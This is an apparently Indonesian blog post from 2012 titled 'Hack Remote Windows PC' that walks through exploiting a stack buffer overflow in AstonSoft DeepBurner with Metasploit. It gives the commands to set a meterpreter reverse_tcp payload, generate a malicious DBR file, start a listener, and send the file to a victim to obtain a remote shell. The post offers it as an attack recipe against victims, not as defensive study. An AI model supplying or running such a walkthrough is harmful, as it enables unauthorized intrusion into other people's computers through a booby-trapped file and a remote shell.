Warung Online
Headlines News :
mas template
Home » , » Hack Remote Windows PC with AstonSoft DeepBurner (DBR File) Path Buffer Overflow

Hack Remote Windows PC with AstonSoft DeepBurner (DBR File) Path Buffer Overflow

Written By Trik Cari Duit on Minggu, 27 Mei 2012 | 16.00

This module exploits a stack-based buffer overflow in versions 1.9.0.228, 1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc). An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded DBR file within a browser, since the DBR extention is registered to DeepBurner..

Exploit Targets
AstonSoft's DeepBurner 1.9.0.228
Windows XP SP 2

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Msf exploit (deepburner_path)>set payload windows/meterpreter/reverse_tcp
Msf exploit (deepburner_path)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (deepburner_path)>exploit   


After we successfully generate the malicious dbr File, it will stored on your local computer
/root/.msf4/local/msf.dbr


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit

Now send your msf.dbr files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Share this article :

0 komentar:

Speak up your mind

Tell us what you're thinking... !

Bisnis Hot
Bisnis Hot
 


Copyright © . Tips N Trik - All Rights Reserved
Proudly powered by Blogger